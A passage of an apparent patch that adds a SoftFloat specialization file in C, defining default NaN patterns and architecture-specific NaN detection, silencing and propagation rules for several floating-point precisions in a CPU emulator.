+arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal warning) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +#if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) +#define SNAN_BIT_IS_ONE 1 +#else +#define SNAN_BIT_IS_ONE 0 +#endif + +#if defined(TARGET_XTENSA) +/* Define for architectures which deviate from IEEE in not supporting + * signaling NaNs (so all NaNs are treated as quiet). + */ +#define NO_SIGNALING_NANS 1 +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated half-precision NaN. +*----------------------------------------------------------------------------*/ +#if defined(TARGET_ARM) +const float16 float16_default_nan = const_float16(0x7E00); +#elif SNAN_BIT_IS_ONE +const float16 float16_default_nan = const_float16(0x7DFF); +#else +const float16 float16_default_nan = const_float16(0xFE00); +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated single-precision NaN. +*----------------------------------------------------------------------------*/ +#if defined(TARGET_SPARC) +const float32 float32_default_nan = const_float32(0x7FFFFFFF); +#elif defined(TARGET_PPC) || defined(TARGET_ARM) || defined(TARGET_ALPHA) || \ + defined(TARGET_XTENSA) +const float32 float32_default_nan = const_float32(0x7FC00000); +#elif SNAN_BIT_IS_ONE +const float32 float32_default_nan = const_float32(0x7FBFFFFF); +#else +const float32 float32_default_nan = const_float32(0xFFC00000); +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated double-precision NaN. +*----------------------------------------------------------------------------*/ +#if defined(TARGET_SPARC) +const float64 float64_default_nan = const_float64(LIT64( 0x7FFFFFFFFFFFFFFF )); +#elif defined(TARGET_PPC) || defined(TARGET_ARM) || defined(TARGET_ALPHA) +const float64 float64_default_nan = const_float64(LIT64( 0x7FF8000000000000 )); +#elif SNAN_BIT_IS_ONE +const float64 float64_default_nan = const_float64(LIT64( 0x7FF7FFFFFFFFFFFF )); +#else +const float64 float64_default_nan = const_float64(LIT64( 0xFFF8000000000000 )); +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated extended double-precision NaN. +*----------------------------------------------------------------------------*/ +#if SNAN_BIT_IS_ONE +#define floatx80_default_nan_high 0x7FFF +#define floatx80_default_nan_low LIT64( 0xBFFFFFFFFFFFFFFF ) +#else +#define floatx80_default_nan_high 0xFFFF +#define floatx80_default_nan_low LIT64( 0xC000000000000000 ) +#endif + +const floatx80 floatx80_default_nan + = make_floatx80_init(floatx80_default_nan_high, floatx80_default_nan_low); + +/*---------------------------------------------------------------------------- +| The pattern for a default generated quadruple-precision NaN. The `high' and +| `low' values hold the most- and least-significant bits, respectively. +*----------------------------------------------------------------------------*/ +#if SNAN_BIT_IS_ONE +#define float128_default_nan_high LIT64( 0x7FFF7FFFFFFFFFFF ) +#define float128_default_nan_low LIT64( 0xFFFFFFFFFFFFFFFF ) +#else +#define float128_default_nan_high LIT64( 0xFFFF800000000000 ) +#define float128_default_nan_low LIT64( 0x0000000000000000 ) +#endif + +const float128 float128_default_nan + = make_float128_init(float128_default_nan_high, float128_default_nan_low); + +/*---------------------------------------------------------------------------- +| Raises the exceptions specified by `flags'. Floating-point traps can be +| defined here if desired. It is currently not possible for such a trap +| to substitute a result value. If traps are not implemented, this routine +| should be simply `float_exception_flags |= flags;'. +*----------------------------------------------------------------------------*/ + +void float_raise( uint8_t flags STATUS_PARAM ) +{ + STATUS(float_exception_flags) |= flags; +} + +/*---------------------------------------------------------------------------- +| Internal canonical NaN format. +*----------------------------------------------------------------------------*/ +typedef struct { + flag sign; + uint64_t high, low; +} commonNaNT; + +#ifdef NO_SIGNALING_NANS +int float16_is_quiet_nan(float16 a_) +{ + return float16_is_any_nan(a_); +} + +int float16_is_signaling_nan(float16 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the half-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float16_is_quiet_nan(float16 a_) +{ + uint16_t a = float16_val(a_); +#if SNAN_BIT_IS_ONE + return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); +#else + return ((a & ~0x8000) >= 0x7c80); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the half-precision floating-point value `a' is a signaling +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float16_is_signaling_nan(float16 a_) +{ + uint16_t a = float16_val(a_); +#if SNAN_BIT_IS_ONE + return ((a & ~0x8000) >= 0x7c80); +#else + return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the half-precision floating point value `a' is a +| signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ +float16 float16_maybe_silence_nan(float16 a_) +{ + if (float16_is_signaling_nan(a_)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + return float16_default_nan; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + uint16_t a = float16_val(a_); + a |= (1 << 9); + return make_float16(a); +#endif + } + return a_; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the half-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT float16ToCommonNaN( float16 a STATUS_PARAM ) +{ + commonNaNT z; + + if ( float16_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR ); + z.sign = float16_val(a) >> 15; + z.low = 0; + z.high = ((uint64_t) float16_val(a))<<54; + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the half- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float16 commonNaNToFloat16(commonNaNT a STATUS_PARAM) +{ + uint16_t mantissa = a.high>>54; + + if (STATUS(default_nan_mode)) { + return float16_default_nan; + } + + if (mantissa) { + return make_float16(((((uint16_t) a.sign) << 15) + | (0x1F << 10) | mantissa)); + } else { + return float16_default_nan; + } +} + +#ifdef NO_SIGNALING_NANS +int float32_is_quiet_nan(float32 a_) +{ + return float32_is_any_nan(a_); +} + +int float32_is_signaling_nan(float32 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float32_is_quiet_nan( float32 a_ ) +{ + uint32_t a = float32_val(a_); +#if SNAN_BIT_IS_ONE + return ( ( ( a>>22 ) & 0x1FF ) == 0x1FE ) && ( a & 0x003FFFFF ); +#else + return ( 0xFF800000 <= (uint32_t) ( a<<1 ) ); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is a signaling +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float32_is_signaling_nan( float32 a_ ) +{ + uint32_t a = float32_val(a_); +#if SNAN_BIT_IS_ONE + return ( 0xFF800000 <= (uint32_t) ( a<<1 ) ); +#else + return ( ( ( a>>22 ) & 0x1FF ) == 0x1FE ) && ( a & 0x003FFFFF ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the single-precision floating point value `a' is a +| signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ + +float32 float32_maybe_silence_nan( float32 a_ ) +{ + if (float32_is_signaling_nan(a_)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + return float32_default_nan; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + uint32_t a = float32_val(a_); + a |= (1 << 22); + return make_float32(a); +#endif + } + return a_; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT float32ToCommonNaN( float32 a STATUS_PARAM ) +{ + commonNaNT z; + + if ( float32_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR ); + z.sign = float32_val(a)>>31; + z.low = 0; + z.high = ( (uint64_t) float32_val(a) )<<41; + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the single- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float32 commonNaNToFloat32( commonNaNT a STATUS_PARAM) +{ + uint32_t mantissa = a.high>>41; + + if ( STATUS(default_nan_mode) ) { + return float32_default_nan; + } + + if ( mantissa ) + return make_float32( + ( ( (uint32_t) a.sign )<<31 ) | 0x7F800000 | ( a.high>>41 ) ); + else + return float32_default_nan; +} + +/*---------------------------------------------------------------------------- +| Select which NaN to propagate for a two-input operation. +| IEEE754 doesn't specify all the details of this, so the +| algorithm is target-specific. +| The routine is passed various bits of information about the +| two NaNs and should return 0 to select NaN a and 1 for NaN b. +| Note that signalling NaNs are always squashed to quiet NaNs +| by the caller, by calling floatXX_maybe_silence_nan() before +| returning them. +| +| aIsLargerSignificand is only valid if both a and b are NaNs +| of some kind, and is true if a has the larger significand, +| or if both a and b have the same significand but a is +| positive but b is negative. It is only needed for the x87 +| tie-break rule. +*----------------------------------------------------------------------------*/ + +#if defined(TARGET_ARM) +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* ARM mandated NaN propagation rules: take the first of: + * 1. A if it is signaling + * 2. B if it is signaling + * 3. A (quiet) + * 4. B (quiet) + * A signaling NaN is always quietened before returning it. + */ + if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (aIsQNaN) { + return 0; + } else { + return 1; + } +} +#elif defined(TARGET_MIPS) +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* According to MIPS specifications, if one of the two operands is + * a sNaN, a new qNaN has to be generated. This is done in + * floatXX_maybe_silence_nan(). For qNaN inputs the specifications + * says: "When possible, this QNaN result is one of the operand QNaN + * values." In practice it seems that most implementations choose + * the first operand if both operands are qNaN. In short this gives + * the following rules: + * 1. A if it is signaling + * 2. B if it is signaling + * 3. A (quiet) + * 4. B (quiet) + * A signaling NaN is always silenced before returning it. + */ + if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (aIsQNaN) { + return 0; + } else { + return 1; + } +} +#elif defined(TARGET_PPC) || defined(TARGET_XTENSA) +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* PowerPC propagation rules: + * 1. A if it sNaN or qNaN + * 2. B if it sNaN or qNaN + * A signaling NaN is always silenced before returning it. + */ + if (aIsSNaN || aIsQNaN) { + return 0; + } else { + return 1; + } +} +#else +static int pickNaN(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag aIsLargerSignificand) +{ + /* This implements x87 NaN propagation rules: + * SNaN + QNaN => return the QNaN + * two SNaNs => return the one with the larger significand, silenced + * two QNaNs => return the one with the larger significand + * SNaN and a non-NaN => return the SNaN, silenced + * QNaN and a non-NaN => return the QNaN + * + * If we get down to comparing significands and they are the same, + * return the NaN with the positive sign bit (if any). + */ + if (aIsSNaN) { + if (bIsSNaN) { + return aIsLargerSignificand ? 0 : 1; + } + return bIsQNaN ? 1 : 0; + } + else if (aIsQNaN) { + if (bIsSNaN || !bIsQNaN) + return 0; + else { + return aIsLargerSignificand ? 0 : 1; + } + } else { + return 1; + } +} +#endif + +/*---------------------------------------------------------------------------- +| Select which NaN to propagate for a three-input operation. +| For the moment we assume that no CPU needs the 'larger significand' +| information. +| Return values : 0 : a; 1 : b; 2 : c; 3 : default-NaN +*----------------------------------------------------------------------------*/ +#if defined(TARGET_ARM) +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + /* For ARM, the (inf,zero,qnan) case sets InvalidOp and returns + * the default NaN + */ + if (infzero && cIsQNaN) { + float_raise(float_flag_invalid STATUS_VAR); + return 3; + } + + /* This looks different from the ARM ARM pseudocode, because the ARM ARM + * puts the operands to a fused mac operation (a*b)+c in the order c,a,b. + */ + if (cIsSNaN) { + return 2; + } else if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (cIsQNaN) { + return 2; + } else if (aIsQNaN) { + return 0; + } else { + return 1; + } +} +#elif defined(TARGET_MIPS) +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + /* For MIPS, the (inf,zero,qnan) case sets InvalidOp and returns + * the default NaN + */ + if (infzero) { + float_raise(float_flag_invalid STATUS_VAR); + return 3; + } + + /* Prefer sNaN over qNaN, in the a, b, c order. */ + if (aIsSNaN) { + return 0; + } else if (bIsSNaN) { + return 1; + } else if (cIsSNaN) { + return 2; + } else if (aIsQNaN) { + return 0; + } else if (bIsQNaN) { + return 1; + } else { + return 2; + } +} +#elif defined(TARGET_PPC) +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + /* For PPC, the (inf,zero,qnan) case sets InvalidOp, but we prefer + * to return an input NaN if we have one (ie c) rather than generating + * a default NaN + */ + if (infzero) { + float_raise(float_flag_invalid STATUS_VAR); + return 2; + } + + /* If fRA is a NaN return it; otherwise if fRB is a NaN return it; + * otherwise return fRC. Note that muladd on PPC is (fRA * fRC) + frB + */ + if (aIsSNaN || aIsQNaN) { + return 0; + } else if (cIsSNaN || cIsQNaN) { + return 2; + } else { + return 1; + } +} +#else +/* A default implementation: prefer a to b to c. + * This is unlikely to actually match any real implementation. + */ +static int pickNaNMulAdd(flag aIsQNaN, flag aIsSNaN, flag bIsQNaN, flag bIsSNaN, + flag cIsQNaN, flag cIsSNaN, flag infzero STATUS_PARAM) +{ + if (aIsSNaN || aIsQNaN) { + return 0; + } else if (bIsSNaN || bIsQNaN) { + return 1; + } else { + return 2; + } +} +#endif + +/*---------------------------------------------------------------------------- +| Takes two single-precision floating-point values `a' and `b', one of which +| is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a +| signaling NaN, the invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static float32 propagateFloat32NaN( float32 a, float32 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + uint32_t av, bv; + + aIsQuietNaN = float32_is_quiet_nan( a ); + aIsSignalingNaN = float32_is_signaling_nan( a ); + bIsQuietNaN = float32_is_quiet_nan( b ); + bIsSignalingNaN = float32_is_signaling_nan( b ); + av = float32_val(a); + bv = float32_val(b); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) + return float32_default_nan; + + if ((uint32_t)(av<<1) < (uint32_t)(bv<<1)) { + aIsLargerSignificand = 0; + } else if ((uint32_t)(bv<<1) < (uint32_t)(av<<1)) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (av < bv) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return float32_maybe_silence_nan(b); + } else { + return float32_maybe_silence_nan(a); + } +} + +/*---------------------------------------------------------------------------- +| Takes three single-precision floating-point values `a', `b' and `c', one of +| which is a NaN, and returns the appropriate NaN result. If any of `a', +| `b' or `c' is a signaling NaN, the invalid exception is raised. +| The input infzero indicates whether a*b was 0*inf or inf*0 (in which case +| obviously c is a NaN, and whether to propagate c or some other NaN is +| implementation defined). +*----------------------------------------------------------------------------*/ + +static float32 propagateFloat32MulAddNaN(float32 a, float32 b, + float32 c, flag infzero STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN; + int which; + + aIsQuietNaN = float32_is_quiet_nan(a); + aIsSignalingNaN = float32_is_signaling_nan(a); + bIsQuietNaN = float32_is_quiet_nan(b); + bIsSignalingNaN = float32_is_signaling_nan(b); + cIsQuietNaN = float32_is_quiet_nan(c); + cIsSignalingNaN = float32_is_signaling_nan(c); + + if (aIsSignalingNaN | bIsSignalingNaN | cIsSignalingNaN) { + float_raise(float_flag_invalid STATUS_VAR); + } + + which = pickNaNMulAdd(aIsQuietNaN, aIsSignalingNaN, + bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN, infzero STATUS_VAR); + + if (STATUS(default_nan_mode)) { + /* Note that this check is after pickNaNMulAdd so that function + * has an opportunity to set the Invalid flag. + */ + return float32_default_nan; + } + + switch (which) { + case 0: + return float32_maybe_silence_nan(a); + case 1: + return float32_maybe_silence_nan(b); + case 2: + return float32_maybe_silence_nan(c); + case 3: + default: + return float32_default_nan; + } +} + +#ifdef NO_SIGNALING_NANS +int float64_is_quiet_nan(float64 a_) +{ + return float64_is_any_nan(a_); +} + +int float64_is_signaling_nan(float64 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float64_is_quiet_nan( float64 a_ ) +{ + uint64_t a = float64_val(a_); +#if SNAN_BIT_IS_ONE + return + ( ( ( a>>51 ) & 0xFFF ) == 0xFFE ) + && ( a & LIT64( 0x0007FFFFFFFFFFFF ) ); +#else + return ( LIT64( 0xFFF0000000000000 ) <= (uint64_t) ( a<<1 ) ); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is a signaling +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float64_is_signaling_nan( float64 a_ ) +{ + uint64_t a = float64_val(a_); +#if SNAN_BIT_IS_ONE + return ( LIT64( 0xFFF0000000000000 ) <= (uint64_t) ( a<<1 ) ); +#else + return + ( ( ( a>>51 ) & 0xFFF ) == 0xFFE ) + && ( a & LIT64( 0x0007FFFFFFFFFFFF ) ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the double-precision floating point value `a' is a +| signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ + +float64 float64_maybe_silence_nan( float64 a_ ) +{ + if (float64_is_signaling_nan(a_)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + return float64_default_nan; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + uint64_t a = float64_val(a_); + a |= LIT64( 0x0008000000000000 ); + return make_float64(a); +#endif + } + return a_; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT float64ToCommonNaN( float64 a STATUS_PARAM) +{ + commonNaNT z; + + if ( float64_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR); + z.sign = float64_val(a)>>63; + z.low = 0; + z.high = float64_val(a)<<12; + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the double- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float64 commonNaNToFloat64( commonNaNT a STATUS_PARAM) +{ + uint64_t mantissa = a.high>>12; + + if ( STATUS(default_nan_mode) ) { + return float64_default_nan; + } + + if ( mantissa ) + return make_float64( + ( ( (uint64_t) a.sign )<<63 ) + | LIT64( 0x7FF0000000000000 ) + | ( a.high>>12 )); + else + return float64_default_nan; +} + +/*---------------------------------------------------------------------------- +| Takes two double-precision floating-point values `a' and `b', one of which +| is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a +| signaling NaN, the invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static float64 propagateFloat64NaN( float64 a, float64 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + uint64_t av, bv; + + aIsQuietNaN = float64_is_quiet_nan( a ); + aIsSignalingNaN = float64_is_signaling_nan( a ); + bIsQuietNaN = float64_is_quiet_nan( b ); + bIsSignalingNaN = float64_is_signaling_nan( b ); + av = float64_val(a); + bv = float64_val(b); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) + return float64_default_nan; + + if ((uint64_t)(av<<1) < (uint64_t)(bv<<1)) { + aIsLargerSignificand = 0; + } else if ((uint64_t)(bv<<1) < (uint64_t)(av<<1)) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (av < bv) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return float64_maybe_silence_nan(b); + } else { + return float64_maybe_silence_nan(a); + } +} + +/*---------------------------------------------------------------------------- +| Takes three double-precision floating-point values `a', `b' and `c', one of +| which is a NaN, and returns the appropriate NaN result. If any of `a', +| `b' or `c' is a signaling NaN, the invalid exception is raised. +| The input infzero indicates whether a*b was 0*inf or inf*0 (in which case +| obviously c is a NaN, and whether to propagate c or some other NaN is +| implementation defined). +*----------------------------------------------------------------------------*/ + +static float64 propagateFloat64MulAddNaN(float64 a, float64 b, + float64 c, flag infzero STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN; + int which; + + aIsQuietNaN = float64_is_quiet_nan(a); + aIsSignalingNaN = float64_is_signaling_nan(a); + bIsQuietNaN = float64_is_quiet_nan(b); + bIsSignalingNaN = float64_is_signaling_nan(b); + cIsQuietNaN = float64_is_quiet_nan(c); + cIsSignalingNaN = float64_is_signaling_nan(c); + + if (aIsSignalingNaN | bIsSignalingNaN | cIsSignalingNaN) { + float_raise(float_flag_invalid STATUS_VAR); + } + + which = pickNaNMulAdd(aIsQuietNaN, aIsSignalingNaN, + bIsQuietNaN, bIsSignalingNaN, + cIsQuietNaN, cIsSignalingNaN, infzero STATUS_VAR); + + if (STATUS(default_nan_mode)) { + /* Note that this check is after pickNaNMulAdd so that function + * has an opportunity to set the Invalid flag. + */ + return float64_default_nan; + } + + switch (which) { + case 0: + return float64_maybe_silence_nan(a); + case 1: + return float64_maybe_silence_nan(b); + case 2: + return float64_maybe_silence_nan(c); + case 3: + default: + return float64_default_nan; + } +} + +#ifdef NO_SIGNALING_NANS +int floatx80_is_quiet_nan(floatx80 a_) +{ + return floatx80_is_any_nan(a_); +} + +int floatx80_is_signaling_nan(floatx80 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is a +| quiet NaN; otherwise returns 0. This slightly differs from the same +| function for other types as floatx80 has an explicit bit. +*----------------------------------------------------------------------------*/ + +int floatx80_is_quiet_nan( floatx80 a ) +{ +#if SNAN_BIT_IS_ONE + uint64_t aLow; + + aLow = a.low & ~ LIT64( 0x4000000000000000 ); + return + ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (uint64_t) ( aLow<<1 ) + && ( a.low == aLow ); +#else + return ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (LIT64( 0x8000000000000000 ) <= ((uint64_t) ( a.low<<1 ))); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is a +| signaling NaN; otherwise returns 0. This slightly differs from the same +| function for other types as floatx80 has an explicit bit. +*----------------------------------------------------------------------------*/ + +int floatx80_is_signaling_nan( floatx80 a ) +{ +#if SNAN_BIT_IS_ONE + return ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (LIT64( 0x8000000000000000 ) <= ((uint64_t) ( a.low<<1 ))); +#else + uint64_t aLow; + + aLow = a.low & ~ LIT64( 0x4000000000000000 ); + return + ( ( a.high & 0x7FFF ) == 0x7FFF ) + && (uint64_t) ( aLow<<1 ) + && ( a.low == aLow ); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the extended double-precision floating point value +| `a' is a signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_maybe_silence_nan( floatx80 a ) +{ + if (floatx80_is_signaling_nan(a)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + a.low = floatx80_default_nan_low; + a.high = floatx80_default_nan_high; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + a.low |= LIT64( 0xC000000000000000 ); + return a; +#endif + } + return a; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point NaN `a' to the canonical NaN format. If `a' is a signaling NaN, the +| invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT floatx80ToCommonNaN( floatx80 a STATUS_PARAM) +{ + commonNaNT z; + + if ( floatx80_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR); + if ( a.low >> 63 ) { + z.sign = a.high >> 15; + z.low = 0; + z.high = a.low << 1; + } else { + z.sign = floatx80_default_nan_high >> 15; + z.low = 0; + z.high = floatx80_default_nan_low << 1; + } + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the extended +| double-precision floating-point format. +*----------------------------------------------------------------------------*/ + +static floatx80 commonNaNToFloatx80( commonNaNT a STATUS_PARAM) +{ + floatx80 z; + + if ( STATUS(default_nan_mode) ) { + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + + if (a.high >> 1) { + z.low = LIT64( 0x8000000000000000 ) | a.high >> 1; + z.high = ( ( (uint16_t) a.sign )<<15 ) | 0x7FFF; + } else { + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + } + + return z; +} + +/*---------------------------------------------------------------------------- +| Takes two extended double-precision floating-point values `a' and `b', one +| of which is a NaN, and returns the appropriate NaN result. If either `a' or +| `b' is a signaling NaN, the invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static floatx80 propagateFloatx80NaN( floatx80 a, floatx80 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + + aIsQuietNaN = floatx80_is_quiet_nan( a ); + aIsSignalingNaN = floatx80_is_signaling_nan( a ); + bIsQuietNaN = floatx80_is_quiet_nan( b ); + bIsSignalingNaN = floatx80_is_signaling_nan( b ); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) { + a.low = floatx80_default_nan_low; + a.high = floatx80_default_nan_high; + return a; + } + + if (a.low < b.low) { + aIsLargerSignificand = 0; + } else if (b.low < a.low) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (a.high < b.high) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return floatx80_maybe_silence_nan(b); + } else { + return floatx80_maybe_silence_nan(a); + } +} + +#ifdef NO_SIGNALING_NANS +int float128_is_quiet_nan(float128 a_) +{ + return float128_is_any_nan(a_); +} + +int float128_is_signaling_nan(float128 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float128_is_quiet_nan( float128 a ) +{ +#if SNAN_BIT_IS_ONE + return + ( ( ( a.high>>47 ) & 0xFFFF ) == 0xFFFE ) + && ( a.low || ( a.high & LIT64( 0x00007FFFFFFFFFFF ) ) ); +#else + return + ( LIT64( 0xFFFE000000000000 ) <= (uint64_t) ( a.high<<1 ) ) + && ( a.low || ( a.high & LIT64( 0x0000FFFFFFFFFFFF ) ) ); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is a +| signaling NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float128_is_signaling_nan( float128 a ) +{ +#if SNAN_BIT_IS_ONE + return + ( LIT64( 0xFFFE000000000000 ) <= (uint64_t) ( a.high<<1 ) ) + && ( a.low || ( a.high & LIT64( 0x0000FFFFFFFFFFFF ) ) ); +#else + return + ( ( ( a.high>>47 ) & 0xFFFF ) == 0xFFFE ) + && ( a.low || ( a.high & LIT64( 0x00007FFFFFFFFFFF ) ) ); +#endif +} +#endif + 